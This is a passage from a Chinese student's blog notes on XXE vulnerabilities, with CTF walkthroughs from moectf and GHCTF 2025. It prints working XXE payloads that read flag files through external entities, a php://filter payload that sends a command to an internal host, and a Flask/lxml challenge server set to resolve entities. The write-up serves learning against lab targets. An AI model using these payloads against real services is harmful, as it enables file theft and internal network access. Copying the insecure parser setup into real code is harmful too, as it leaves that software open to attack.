<h2 id="利用-XXE-进行-SSRF-利用"><a href="#利用-XXE-进行-SSRF-利用" class="headerlink" title="利用 XXE 进行 SSRF 利用"></a>利用 XXE 进行 SSRF 利用</h2><p>核心还是用到 http 协议,且这里的地址可以填内网的另一台主机甚至发 get 请求</p>
<p>内网另一台主机返回的回显会回显至具有 XXE 漏洞的网站</p>
<p><img src="/images/TKoTbD4nCoTsWixxsDKcj5Jtncg.png"></p>
<h2 id="利用-PHP-伪协议读取源代码等文件"><a href="#利用-PHP-伪协议读取源代码等文件" class="headerlink" title="利用 PHP 伪协议读取源代码等文件"></a>利用 PHP 伪协议读取源代码等文件</h2><p>用 file 伪协议读取正确的 php 文件，它会直接被执行，不能查阅内容</p>
<p>而相比较 file 伪协议，<strong>PHP 伪协议可以对读取出的文件进行数据编码。</strong></p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;!DOCTYPE <span class="keyword">root</span>[<span class="meta">&lt;!ENTITY <span class="keyword">ben</span> <span class="keyword">SYSTEM</span></span></span></span><br><span class="line"><span class="meta"><span class="meta"><span class="string">&quot;php://filter/read=convert.base64-</span></span></span></span><br><span class="line"><span class="string"><span class="meta"><span class="meta">encode/resource=http://10.1.2.3/?cmd=cat+index.php&quot;</span>&gt;</span>]&gt;</span></span><br></pre></td></tr></table></figure>

<p>其中 cat+index.php 用于查看 index 的源代码</p>
<p>第三章的时候学过，这里要用 base64 的形式读取文件，否则 php 文件会直接被执行了</p>
<p>PHP 伪协议举例，可以见 2026 春秋杯冬季赛第七题</p>
<h1 id="10-3-实验-XXE-漏洞实践"><a href="#10-3-实验-XXE-漏洞实践" class="headerlink" title="[10.3]实验:XXE 漏洞实践"></a>[10.3]实验:XXE 漏洞实践</h1><p>我们继续把实验做完</p>
<h2 id="moectf-10-第十章-天机符阵"><a href="#moectf-10-第十章-天机符阵" class="headerlink" title="moectf 10 第十章 天机符阵"></a>moectf 10 第十章 天机符阵</h2><p>10.2 节漏洞举例</p>
<h2 id="moectf-10-第十章-天机符阵-revenge"><a href="#moectf-10-第十章-天机符阵-revenge" class="headerlink" title="moectf 10 第十章 天机符阵_revenge"></a>moectf 10 第十章 天机符阵_revenge</h2><p>flag 换了个位置，这次在根目录了</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;!DOCTYPE <span class="keyword">data</span> [  <span class="meta">&lt;!ENTITY <span class="keyword">value</span> <span class="keyword">SYSTEM</span> <span class="string">&quot;file:///flag.txt&quot;</span>&gt;</span>]&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">root</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">阵枢</span>&gt;</span>1<span class="tag">&lt;/<span class="name">阵枢</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">解析</span>&gt;</span><span class="symbol">&amp;value;</span><span class="tag">&lt;/<span class="name">解析</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">输出</span>&gt;</span>3<span class="tag">&lt;/<span class="name">输出</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">root</span>&gt;</span></span><br></pre></td></tr></table></figure>

<p><img src="/images/LfXRbMr0koiR1ExHkKBcCrR6n8s.png"></p>
<h3 id="做题启示"><a href="#做题启示" class="headerlink" title="做题启示"></a>做题启示</h3><p>flag 的位置因题而异，可以按之前那道题的思路找 flag，也要找根目录下是否有 flag</p>
<h2 id="GHCTF-2025"><a href="#GHCTF-2025" class="headerlink" title="GHCTF 2025"></a><a href="%3E%EF%B9%8F%3C">GHCTF 2025</a></h2><p>这题比较综合，要自己阅读源代码，如果你用 Burp 抓包的方法，还要自己构造 post 请求，我自己也开了很多遍靶机才做出来</p>
<p>题目没换行，我们先给它换个行</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> flask <span class="keyword">import</span> Flask,request</span><br><span class="line"><span class="keyword">import</span> base64</span><br><span class="line"><span class="keyword">from</span> lxml <span class="keyword">import</span> etree</span><br><span class="line"><span class="keyword">import</span> re</span><br><span class="line"></span><br><span class="line">app = Flask(__name__)</span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">&#x27;/&#x27;</span></span>)</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">index</span>():</span><br><span class="line">    <span class="keyword">return</span> <span class="built_in">open</span>(__file__).read()</span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">&#x27;/ghctf&#x27;</span>,methods=[<span class="string">&#x27;POST&#x27;</span>]</span>)</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">parse</span>():</span><br><span class="line">    xml=request.form.get(<span class="string">&#x27;xml&#x27;</span>)</span><br><span class="line">    <span class="built_in">print</span>(xml)</span><br><span class="line">    <span class="keyword">if</span> xml <span class="keyword">is</span> <span class="literal">None</span>:</span><br><span class="line">        <span class="keyword">return</span> <span class="string">&quot;No System is Safe.&quot;</span></span><br><span class="line">    parser = etree.XMLParser(load_dtd=<span class="literal">True</span>, resolve_entities=<span class="literal">True</span>)</span><br><span class="line">    root = etree.fromstring(xml, parser)</span><br><span class="line">    name=root.find(<span class="string">&#x27;name&#x27;</span>).text</span><br><span class="line">    <span class="keyword">return</span> name <span class="keyword">or</span> <span class="literal">None</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__==<span class="string">&quot;__main__&quot;</span>:</span><br><span class="line">    app.run(host=<span class="string">&#x27;0.0.0.0&#x27;</span>,port=<span class="number">8080</span>)</span><br></pre></td></tr></table></figure>

<p>读题，这代码蛮难看懂的，需要一定审计能力，借助了一下 AI，大概理解了:</p>
<p>我们要用 POST 方式去访问&#x2F;ghctf(用 get 它就给你报错) 第 14 行 xml 应该可以通过递表单修改，但是不知道是 get 还是 post，还是都行</p>
<p>因为我们访问这个路由都得用 post，所以下面的 xml 必须要用 post 提交</p>
<p>这是一点，第二点是下面的 name，你得通过代码审计判断出这是要求你的 xml 数据一定要有 name 这个标签，而且通过后续的提交发现回显位也是 name</p>
<h3 id="法一-Hackbar-方法"><a href="#法一-Hackbar-方法" class="headerlink" title="法一 Hackbar 方法"></a>法一 Hackbar 方法</h3><p>一开始用 Hackbar 投 xml，发现回显位就是 name，确实回显了 1</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">root</span>&gt;</span><span class="tag">&lt;<span class="name">name</span>&gt;</span><span class="symbol">&amp;value;</span><span class="tag">&lt;/<span class="name">name</span>&gt;</span><span class="tag">&lt;/<span class="name">root</span>&gt;</span></span><br></pre></td></tr></table></figure>

<p><img src="/images/Qw1ybheoEoVgKCxM4MhcYRTEnPe.png"></p>
<p>但添加了木马以后问题就来了</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;!DOCTYPE <span class="keyword">data</span> [<span class="meta">&lt;!ENTITY <span class="keyword">value</span> <span class="keyword">SYSTEM</span> <span class="string">&quot;file:///flag&quot;</span>&gt;</span>]&gt;</span><span class="tag">&lt;<span class="name">root</span>&gt;</span><span class="tag">&lt;<span class="name">name</span>&gt;</span><span class="symbol">&amp;value;</span><span class="tag">&lt;/<span class="name">name</span>&gt;</span><span class="tag">&lt;/<span class="name">root</span>&gt;</span></span><br></pre></td></tr></table></figure>

<p>它不认了</p>
<p><img src="/images/YkKob3cPMogcNPxxLfKcUHLfn0f.png"></p>
<p>我特意没有换行，怕像课上说的一样换行会出问题，结果最后还是错</p>
<p>于是我又把目光投向到空格，这没准要 URL 编码</p>
<p>我又把他 URL 编码了一番</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">%3C!DOCTYPE%20data%<span class="number">20</span>%5B%3C!ENTITY%20value%20SYSTEM%<span class="number">20</span>%22file%3A%2F%2F%2Fflag%<span class="number">22</span>%3E%5D%3E%3Croot%3E%3Cname%3E%26value%3B%3C%2Fname%3E%3C%2Froot%3E</span><br></pre></td></tr></table></figure>

<p>运行通过了</p>
<p><img src="/images/D2SnbxGCjoqvKJx3ANKcL03ynSh.png"></p>
<h3 id="法二-Burp-方法"><a href="#法二-Burp-方法" class="headerlink" title="法二 Burp 方法"></a>法二 Burp 方法</h3><p>有时候代码太长确实不太想换行，我又考虑了一下 Burp 方法伪造 POST 请求，但这题有点麻烦</p>
<p>我们用内嵌浏览器访问题目，发现默认是 get</p>
<p><img src="/images/OIU6bXVUZohLq1xT7SpcLzoNnJh.png"></p>
<p>要伪造 POST 请求首先这里的 get 要改成 post</p>
<p>其次还需在最后一行添加</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Content-<span class="type">Type</span>: application/x-www-form-urlencoded</span><br></pre></td></tr></table></figure>

<p>最后另起一行，写好 xml 值</p>
<p>像这样</p>
<p><img src="/images/DLyJba1yNoqjeFxU6AScxJ6xn40.png"></p>
<p>下面的把他 URL 编码了</p>
<p><img src="/images/EDRSb42AFobNEcxdsbuc4pFFnEe.png"></p>
<p>点提交，就过了</p>
<p><img src="/images/GFy4baD6UoCetTxtjbRcGEFEnEc.png"></p>
<p>这样就不用换行</p>
<p>不过也麻烦，因为没有现成的 POST 模板给你改，你得自己做一个</p>
<h3 id="做题启示-1"><a href="#做题启示-1" class="headerlink" title="做题启示"></a>做题启示</h3><p>1.post 提交 xml 值的时候，不能换行，且需要 URL 编码</p>
<p>2.Burp 构造 POST 时要注意这三点，第一是 GET 改 POST，第二是增加必要的那行代码，第三就是 URL 编码</p>
<p>3.从始至终我们一直没离开 URL 编码，因为我们这次是用 get 和 post 改表单数据，而前面的题是在输入框提交</p>
<p>，有的没有动到表单数据</p>
<h2 id="ctf-Week3-查查忆"><a href="#ctf-Week3-查查忆" class="headerlink" title="?ctf [Week3] 查查忆"></a>?ctf [Week3] 查查忆</h2><p>这题平台有问题，做不了</p>
<p><em>– 周六刚完事 XXE 第二节，今天做 UniCTF，发现 web 解最多的那题是 XXE 漏洞，借助 AI 做对了，也是今天唯一做对的题，很巧，题也很巧妙，结合了一下文件上传，下周会补一下做题感受和 WP</em></p>

    </div>

    
    
    

      <footer class="post-footer">

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2026/01/18/%E7%AC%AC%E4%B9%9D%E7%AB%A0-XSS%E6%94%BB%E5%87%BB/" rel="prev" title="第九章-XSS攻击">
      <i class="fa fa-chevron-left"></i> 第九章-XSS攻击
    </a></div>
      <div class="post-nav-item">
    <a href="/2026/01/30/%E5%AE%9E%E6%88%98%E8%AE%B0%E5%BD%95-UniCTF2025%C2%B7%E8%B5%9B%E9%A2%98WP/" rel="next" title="[实战记录]UniCTF2025·赛题WP">
      [实战记录]UniCTF2025·赛题WP <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#10-1-XXE-%E6%BC%8F%E6%B4%9E%E7%BB%AA%E8%AE%BA"><span class="nav-number">1.</span> <span class="nav-text">[10.1]XXE 漏洞绪论</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#XXE-%E6%BC%8F%E6%B4%9E%E7%AE%80%E4%BB%8B"><span class="nav-number">1.1.</span> <span class="nav-text">XXE 漏洞简介</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#xml-%E8%AF%AD%E8%A8%80"><span class="nav-number">1.2.</span> <span class="nav-text">xml 语言</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#xml-%E4%BB%8B%E7%BB%8D"><span class="nav-number">1.2.1.</span> <span class="nav-text">xml 介绍</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#xml-%E8%AF%AD%E6%B3%95"><span class="nav-number">1.2.2.</span> <span class="nav-text">xml 语法</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%AE%9E%E4%BD%93%E5%BC%95%E7%94%A8%E7%9A%84%E8%AF%AD%E6%B3%95"><span class="nav-number">1.2.2.1.</span> <span class="nav-text">实体引用的语法</span></a></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E4%BD%BF%E7%94%A8-php-%E8%A7%A3%E6%9E%90-xml"><span class="nav-number">1.3.</span> <span class="nav-text">使用 php 解析 xml</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#simplexml-load-file-%E5%87%BD%E6%95%B0"><span class="nav-number">1.3.1.</span> <span class="nav-text">simplexml_load_file()函数</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E4%BD%BF%E7%94%A8-DOMDocument-%E8%AF%BB%E5%8F%96-XML-%E6%96%87%E6%A1%A3"><span class="nav-number">1.3.2.</span> <span class="nav-text">使用 DOMDocument 读取 XML 文档</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%B7%B7%E5%90%88%E4%BD%BF%E7%94%A8%E8%AF%BB%E5%8F%96-xml-%E6%96%87%E6%A1%A3"><span class="nav-number">1.3.3.</span> <span class="nav-text">混合使用读取 xml 文档</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#DTD-%E5%A3%B0%E6%98%8E"><span class="nav-number">1.4.</span> <span class="nav-text">DTD 声明</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%A4%96%E9%83%A8%E5%BC%95%E7%94%A8-DTD-%E6%96%87%E4%BB%B6"><span class="nav-number">1.4.1.</span> <span class="nav-text">外部引用 DTD 文件</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#XML-%E5%AE%9E%E4%BD%93"><span class="nav-number">1.5.</span> <span class="nav-text">XML 实体</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%AE%9E%E4%BD%93%E7%9A%84%E5%90%AB%E4%B9%89"><span class="nav-number">1.5.1.</span> <span class="nav-text">实体的含义</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%AD%97%E7%AC%A6%E5%AE%9E%E4%BD%93"><span class="nav-number">1.5.2.</span> <span class="nav-text">字符实体</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%91%BD%E5%90%8D%E5%AE%9E%E4%BD%93"><span class="nav-number">1.5.3.</span> <span class="nav-text">命名实体</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%A4%96%E9%83%A8%E5%AE%9E%E4%BD%93"><span class="nav-number">1.5.4.</span> <span class="nav-text">外部实体</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%8F%82%E6%95%B0%E5%AE%9E%E4%BD%93"><span class="nav-number">1.5.5.</span> <span class="nav-text">参数实体</span></a></li></ol></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#10-2-XXE-%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8"><span class="nav-number">2.</span> <span class="nav-text">[10.2]XXE 漏洞利用</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%88%A4%E6%96%AD-XXE-%E6%BC%8F%E6%B4%9E%E7%9A%84%E6%96%B9%E6%B3%95"><span class="nav-number">2.1.</span> <span class="nav-text">判断 XXE 漏洞的方法</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E4%BD%BF%E7%94%A8%E5%A4%96%E9%83%A8%E5%AE%9E%E4%BD%93%E8%AF%BB%E5%8F%96%E6%96%87%E4%BB%B6-file-%E5%8D%8F%E8%AE%AE"><span class="nav-number">2.2.</span> <span class="nav-text">使用外部实体读取文件(file 协议)</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E4%BE%8B%E9%A2%98-%E7%AC%AC%E5%8D%81%E7%AB%A0-%E5%A4%A9%E6%9C%BA%E7%AC%A6%E9%98%B5"><span class="nav-number">2.2.1.</span> <span class="nav-text">[例题]第十章 天机符阵</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%88%A9%E7%94%A8%E5%8F%82%E6%95%B0%E5%AE%9E%E4%BD%93%E5%92%8C-HTTP-%E5%8D%8F%E8%AE%AE%E7%BB%95%E8%BF%87-file-%E8%BF%87%E6%BB%A4"><span class="nav-number">2.3.</span> <span class="nav-text">利用参数实体和 HTTP 协议绕过 file 过滤</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%88%A9%E7%94%A8-XXE-%E8%BF%9B%E8%A1%8C-SSRF-%E5%88%A9%E7%94%A8"><span class="nav-number">2.4.</span> <span class="nav-text">利用 XXE 进行 SSRF 利用</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%88%A9%E7%94%A8-PHP-%E4%BC%AA%E5%8D%8F%E8%AE%AE%E8%AF%BB%E5%8F%96%E6%BA%90%E4%BB%A3%E7%A0%81%E7%AD%89%E6%96%87%E4%BB%B6"><span class="nav-number">2.5.</span> <span class="nav-text">利用 PHP 伪协议读取源代码等文件</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#10-3-%E5%AE%9E%E9%AA%8C-XXE-%E6%BC%8F%E6%B4%9E%E5%AE%9E%E8%B7%B5"><span class="nav-number">3.</span> <span class="nav-text">[10.3]实验:XXE 漏洞实践</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#moectf-10-%E7%AC%AC%E5%8D%81%E7%AB%A0-%E5%A4%A9%E6%9C%BA%E7%AC%A6%E9%98%B5"><span class="nav-number">3.1.</span> <span class="nav-text">moectf 10 第十章 天机符阵</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#moectf-10-%E7%AC%AC%E5%8D%81%E7%AB%A0-%E5%A4%A9%E6%9C%BA%E7%AC%A6%E9%98%B5-revenge"><span class="nav-number">3.2.</span> <span class="nav-text">moectf 10 第十章 天机符阵_revenge</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%81%9A%E9%A2%98%E5%90%AF%E7%A4%BA"><span class="nav-number">3.2.1.</span> <span class="nav-text">做题启示</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#GHCTF-2025"><span class="nav-number">3.3.</span> <span class="nav-text">GHCTF 2025</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%B3%95%E4%B8%80-Hackbar-%E6%96%B9%E6%B3%95"><span class="nav-number">3.3.1.</span> <span class="nav-text">法一 Hackbar 方法</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%B3%95%E4%BA%8C-Burp-%E6%96%B9%E6%B3%95"><span class="nav-number">3.3.2.</span> <span class="nav-text">法二 Burp 方法</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%81%9A%E9%A2%98%E5%90%AF%E7%A4%BA-1"><span class="nav-number">3.3.3.</span> <span class="nav-text">做题启示</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#ctf-Week3-%E6%9F%A5%E6%9F%A5%E5%BF%86"><span class="nav-number">3.4.</span> <span class="nav-text">?ctf [Week3] 查查忆</span></a></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">legend1440</p>
  <div class="site-description" itemprop="description">前进中的CTF-web现役队员</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives">
          <span class="site-state-item-count">23</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
        <span class="site-state-item-count">4</span>
        <span class="site-state-item-name">分类</span>
      </div>
  </nav>
</div>
  <div class="links-of-author motion-element">
      <span class="links-of-author-item">
        <a href="http://hnu-legend1440.com/" title="1535548287 → http:&#x2F;&#x2F;hnu-legend1440.com"><i class="fab fa-qq fa-fw"></i>1535548287</a>
      </span>
      <span class="links-of-author-item">
        <a href="https://www.hnusec.com/" title="HnuSec → https:&#x2F;&#x2F;www.hnusec.com&#x2F;" rel="noopener" target="_blank"><i class="fa fa-house-signal fa-fw"></i>HnuSec</a>
      </span>
      <span class="links-of-author-item">
        <a href="https://qm.qq.com/q/15T8HZQOFK" title="服务器群 → https:&#x2F;&#x2F;qm.qq.com&#x2F;q&#x2F;15T8HZQOFK" rel="noopener" target="_blank"><i class="far fa-house-signal fa-fw"></i>服务器群</a>
      </span>
      <span class="links-of-author-item">
        <a href="https://space.bilibili.com/652601966?spm_id_from=333.788.0.0" title="BiliBili → https:&#x2F;&#x2F;space.bilibili.com&#x2F;652601966?spm_id_from&#x3D;333.788.0.0" rel="noopener" target="_blank"><i class="fa fa-play fa-fw"></i>BiliBili</a>
      </span>
  </div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; Sun Jan 18 2026 08:00:00 GMT+0800 (GMT+08:00) – 
  <span itemprop="copyrightYear">2026</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">legend1440</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Gemini</a> 强力驱动
  </div>

        
<div class="busuanzi-count">
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
    <span class="post-meta-item" id="busuanzi_container_site_uv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-user"></i>
      </span>
      <span class="site-uv" title="总访客量">
        <span id="busuanzi_value_site_uv"></span>
      </span>
    </span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item" id="busuanzi_container_site_pv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-eye"></i>
      </span>
      <span class="site-pv" title="总访问量">
        <span id="busuanzi_value_site_pv"></span>
      </span>
    </span>
</div>








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  




  
<script src="/js/local-search.js"></script>













  

  

</body>
</html>
